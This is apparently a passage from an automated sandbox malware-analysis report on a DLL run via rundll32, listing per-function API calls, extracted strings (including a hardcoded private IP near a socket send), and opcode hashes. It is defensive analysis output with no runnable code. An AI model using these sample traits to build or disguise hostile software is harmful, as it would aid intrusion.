                                                                                                                    • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                    • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                    • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                    • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                    • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                    • GetWindowRect.USER32 ref: 1002059C
                                                                                                                    • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1315500227-0
                                                                                                                    • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                    • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                    • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                    • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                    • API String ID: 2102423945-4122032997
                                                                                                                    • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                    • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                    • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                    • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                    • String ID: System
                                                                                                                    • API String ID: 1529587224-3470857405
                                                                                                                    • Opcode ID: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                    • Instruction ID: 0e81d0f59cd66082c3aa20aff96d3ec22f48ed16ea157d431ad3d5bc96dc32b7
                                                                                                                    • Opcode Fuzzy Hash: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                    • Instruction Fuzzy Hash: B441C275900215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                    • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                    • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                    • API String ID: 2418878492-2500072749
                                                                                                                    • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                    • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                    • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                    • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                    • _memset.LIBCMT ref: 1001579D
                                                                                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                    • LoadBitmapA.USER32 ref: 10015807
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4271682439-3916222277
                                                                                                                    • Opcode ID: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                    • Instruction ID: fd313e63bbbbf4de8925541e866d87c57cd6a5f11e69b9eb671f3de319ba3105
                                                                                                                    • Opcode Fuzzy Hash: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
                                                                                                                    • Instruction Fuzzy Hash: 2831C072A00216DFEB10CF78DDCAAAE7BB5EB44645F15052AE506EF2C1E631E9448750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                    • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                    • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2429671754-3916222277
                                                                                                                    • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                    • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                    • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                    • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                    • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                    • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: System$Metrics$InfoParameters
                                                                                                                    • String ID: B$DISPLAY
                                                                                                                    • API String ID: 3136151823-3316187204
                                                                                                                    • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                    • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                    • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                    • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Edit
                                                                                                                    • API String ID: 0-554135844
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                    • SendMessageA.USER32 ref: 10023CD9
                                                                                                                    • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                    • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                    • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 187318432-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                      • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 69039007-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                    • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                      • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                      • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                    • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                    • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Mode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 696222070-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                    • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                      • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                      • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                    • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                    • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Mode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 696222070-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                    • _memset.LIBCMT ref: 10020424
                                                                                                                    • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                    • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 289641511-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                      • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                      • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                      • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                      • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                    • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                      • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                    • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                    • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2731880238-0
                                                                                                                    • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                    • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                    • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                    • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                    • SetWindowLongA.USER32 ref: 10012989
                                                                                                                      • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LongMenuWindow$AppendSystem
                                                                                                                    • String ID: 192.168.3.85$Message
                                                                                                                    • API String ID: 4121476972-856608562
                                                                                                                    • Opcode ID: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                    • Instruction ID: 340d0da2b4c657a0b825359f55c53a9166b08011863532f0c2811cf24d97780a
                                                                                                                    • Opcode Fuzzy Hash: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                    • Instruction Fuzzy Hash: F2411B74A4020A9BDB04DB94CCA2FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                      • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                      • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                      • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                    • _strcat.LIBCMT ref: 1001310A
                                                                                                                      • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                    • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 16450322-3653984579
                                                                                                                    • Opcode ID: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                    • Instruction ID: f6b77999ec19404b7b7ce6cfec7bf3295ff1974a42ab232d1976716b8ec2d843
                                                                                                                    • Opcode Fuzzy Hash: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                    • Instruction Fuzzy Hash: 01410DB59001189FDB24DB64CC91BEEB775FF44304F5082ADE51AA7282DF346A85CF54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                      • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                      • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                      • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                      • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                    • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                    • API String ID: 3274081130-63838506
                                                                                                                    • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                    • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                    • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                    • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
